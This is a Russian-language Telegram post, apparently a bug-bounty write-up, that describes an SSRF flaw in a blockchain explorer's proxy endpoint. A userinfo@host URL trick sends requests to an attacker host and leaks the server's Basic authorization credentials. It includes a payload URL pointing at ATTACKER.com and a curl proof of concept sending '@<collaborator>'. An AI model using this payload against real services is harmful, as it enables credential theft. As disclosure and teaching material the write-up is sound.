TGViewer
Пингискок Пингискок @rmrf_0 · 618 subscribers
Post #14 526
SSRF бесполезная бага. Казалось бы...

SSRF - утечка credentials через proxy-эндпоинт

Уязвимый endpoint такой:

POST https://explorer.example.com/api/proxy

Что происходит?

Blockchain explorer на Next.js проксирует запросы к внешнему API аналитики. На бэкенде формируется URL вида:
https://node-lite.webapi.analytics.io{path}

Параметр path берётся напрямую из JSON body без валидации. Символ @ в URL позволяет провернуть классический URL parsing confusion (userinfo@newhost):

https://node-lite.webapi.analytics.io@ATTACKER.com/capture


URL-парсер считает всё до @ логином, а ATTACKER.com реальным хостом.

Что утекло

Сервер при каждом проксируемом запросе автоматически прикрепляет заголовок:
Authorization: Basic <base64_credentials>

PoC

curl -sk -X POST "https://explorer.example.com/api/proxy" \
-H "Content-Type: application/json" \
-d '{"path":"@<collaborator>/ssrf-capture","data":{}}'
  • 🔥 7
  • ⚡ 1
  • 🗿 1
  • 🆒 1
More from @rmrf_0
  1. May 1, 2026Белый хакер: “может, всё-таки responsibly disclose?” Google: давай! memory corruption - 50…
  2. Apr 13, 2026DeFi-протоколы не взламывают. Они просто не закрыты. Омар рассказал кейс про то как их AI-…
  3. Apr 8, 2026Claude Mythos.. .. еще не выпущен, но опубликовали исследование про него: https://red.anth…
  4. Apr 6, 2026Как КНДР полгода играла в квант-фонд и вынесла $285M из Drift Drift - крупнейший перпетуал…
  5. Apr 3, 2026Мое лицо когда закрыл серию статей (думайте, какое именно лицо мое) Закрыл, да не полность…
  6. Mar 28, 2026Продолжение серии про JWT - шесть новых статей Криптография, шифрование, библиотеки, OAuth…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →